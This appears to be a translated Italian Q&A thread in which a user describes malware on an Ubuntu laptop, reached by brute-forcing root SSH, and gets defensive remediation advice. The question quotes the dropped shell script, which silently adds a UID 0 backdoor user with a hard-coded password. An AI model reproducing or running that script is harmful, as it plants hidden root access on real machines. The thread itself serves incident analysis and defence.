Come gestire il malware sul mio laptop?

12

Sono abbastanza sicuro che il mio laptop Ubuntu 13.10 sia stato infettato da una sorta di malware.

Ogni tanto, trovo un processo / lib / sshd (di proprietà di root) in esecuzione e che consuma molta CPU. Non è il server sshd che esegue / usr / sbin / sshd.

Il binario ha i permessi --wxrw-rwt e genera e genera script nella directory / lib. Uno recente si chiama 13959730401387633604 e fa il seguente

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

L'utente gusr è stato creato dal malware in modo indipendente, quindi il chpasswd si blocca mentre consuma il 100% della CPU.

Finora, ho identificato che l'utente gusr è stato aggiunto ai file in / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Sembra che il malware abbia fatto delle copie di tutti questi file con il suffisso "-". L'elenco completo di / etc / file che sono stati modificati da root è disponibile qui .

Inoltre, il file / etc / hosts è stato modificato in questo .

Il / lib / sshd inizia aggiungendosi alla fine del file /etc/init.d/rc.local!

Ho rimosso l'utente, rimosso i file, eliminato l'albero di elaborazione, modificato i miei passwors e rimosso le chiavi pubbliche ssh.

Sono consapevole che sono fondamentalmente fottuto e molto probabilmente reinstallerò l'intero sistema. Tuttavia, dal momento che accedo a molte altre macchine, sarebbe bene almeno tentare di rimuoverlo, e capire come ho ottenuto. Qualche suggerimento su come procedere sarebbe apprezzato.

Sembra che siano entrati il ​​25 marzo con il login root forzato. Non avevo idea che root ssh sia abilitato di default in Ubuntu. L'ho disabilitato e ho installato denyhosts.

Il login era da 59.188.247.236, da qualche parte a Hong Kong apparentemente.

Ho preso il laptop da EmperorLinux e hanno abilitato l'accesso root. Se ne hai uno e stai facendo funzionare sshd.

    
posta Dejan Jovanović 30.03.2014 - 03:29
fonte

1 risposta

11

Per prima cosa, togli quella macchina dalla rete ora!

In secondo luogo, perché hai abilitato l'account di root? Non dovresti abilitare l'account di root, a meno che tu non abbia una buona ragione per farlo.

In terzo luogo, sì, l'unico modo per essere sicuri di essere pulito è fare un'installazione pulita. Si consiglia inoltre di ricominciare da capo e di non tornare a un backup, poiché non si può mai essere sicuri di quando tutto è iniziato.

Suggerisco anche di configurare un firewall nella prossima installazione e di negare tutte le connessioni in entrata:

sudo ufw default deny incoming

e quindi consentire ssh con:

sudo ufw allow ssh

e NON abilitare l'account root! Certamente assicurati che il login root ssh sia disabilitato.

    
risposta data Seth 30.03.2014 - 06:12
fonte

Leggi altre domande sui tag